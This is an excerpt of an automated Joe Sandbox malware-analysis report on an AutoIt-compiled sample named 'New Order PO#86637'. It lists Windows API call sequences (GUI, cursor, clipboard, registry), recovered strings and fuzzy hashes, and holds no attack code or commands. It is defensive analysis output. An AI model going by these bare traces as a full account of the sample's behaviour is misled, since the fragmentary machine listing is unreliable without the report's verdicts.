                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                            • String ID:
                                                                            • API String ID: 69173610-0
                                                                            • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                            • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                            • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                            • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                            APIs
                                                                            • DestroyWindow.USER32(?), ref: 004590F2
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                            • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                            • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                            • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                            • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                            • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                            • API String ID: 2910397461-517079104
                                                                            • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                            • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                            • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                            • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                            • API String ID: 1038674560-3360698832
                                                                            • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                            • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                            • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                            • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                            APIs
                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                            • SetCursor.USER32(00000000), ref: 0043075B
                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                            • SetCursor.USER32(00000000), ref: 00430773
                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                            • SetCursor.USER32(00000000), ref: 0043078B
                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                            • SetCursor.USER32(00000000), ref: 004307A3
                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                            • SetCursor.USER32(00000000), ref: 004307BB
                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                            • SetCursor.USER32(00000000), ref: 004307D3
                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                            • SetCursor.USER32(00000000), ref: 004307EB
                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                            • SetCursor.USER32(00000000), ref: 00430803
                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                            • SetCursor.USER32(00000000), ref: 0043081B
                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                            • SetCursor.USER32(00000000), ref: 00430833
                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                            • SetCursor.USER32(00000000), ref: 0043084B
                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                            • SetCursor.USER32(00000000), ref: 00430863
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                            • SetCursor.USER32(00000000), ref: 0043087B
                                                                            • SetCursor.USER32(00000000), ref: 00430887
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                            • SetCursor.USER32(00000000), ref: 0043089F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load
                                                                            • String ID:
                                                                            • API String ID: 1675784387-0
                                                                            • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                            • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                            • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                            • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                            APIs
                                                                            • GetSysColor.USER32(0000000E), ref: 00430913
                                                                            • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                            • GetSysColor.USER32(00000012), ref: 00430933
                                                                            • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                            • GetSysColor.USER32(0000000F), ref: 00430959
                                                                            • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                            • GetSysColor.USER32(00000011), ref: 00430979
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                            • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                            • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                            • SelectObject.GDI32(?,?), ref: 004309B4
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                            • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                            • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                            • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                            • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                            • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                            • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                            • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                            • DeleteObject.GDI32(?), ref: 00430AE9
                                                                            • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                            • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 1582027408-0
                                                                            • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                            • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                            • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                            • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                            APIs
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CloseConnectCreateRegistry
                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                            • API String ID: 3217815495-966354055
                                                                            • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                            • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                            • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                            • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 004566AE
                                                                            • GetDesktopWindow.USER32 ref: 004566C3
                                                                            • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                            • DestroyWindow.USER32(?), ref: 00456746
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                            • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                            • IsWindowVisible.USER32(?), ref: 0045682C
                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                            • GetWindowRect.USER32(?,?), ref: 00456873
                                                                            • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                            • CopyRect.USER32(?,?), ref: 004568BE
                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                            • String ID: ($,$tooltips_class32
                                                                            • API String ID: 225202481-3320066284
                                                                            • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                            • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                            • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                            • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                            APIs
                                                                            • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                            • CloseClipboard.USER32 ref: 0046DD0D
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                            • CloseClipboard.USER32 ref: 0046DD41
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                            • CloseClipboard.USER32 ref: 0046DD99
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                            • String ID:
                                                                            • API String ID: 15083398-0
                                                                            • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                            • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                            • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                            • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                            APIs
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                            • GetClientRect.USER32(?,?), ref: 00471D05
                                                                            • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                            • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                            • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                            • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                            • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                            • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                            • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                            • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                            • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                            • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                            • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                            • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                            • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                            • String ID: @$AutoIt v3 GUI
                                                                            • API String ID: 867697134-3359773793
                                                                            • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                            • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                            • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                            • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                            • API String ID: 1503153545-1459072770
                                                                            • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                            • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                            • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                            • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll$__wcsnicmp
                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                            • API String ID: 790654849-32604322
                                                                            • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                            • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                            • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                            • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
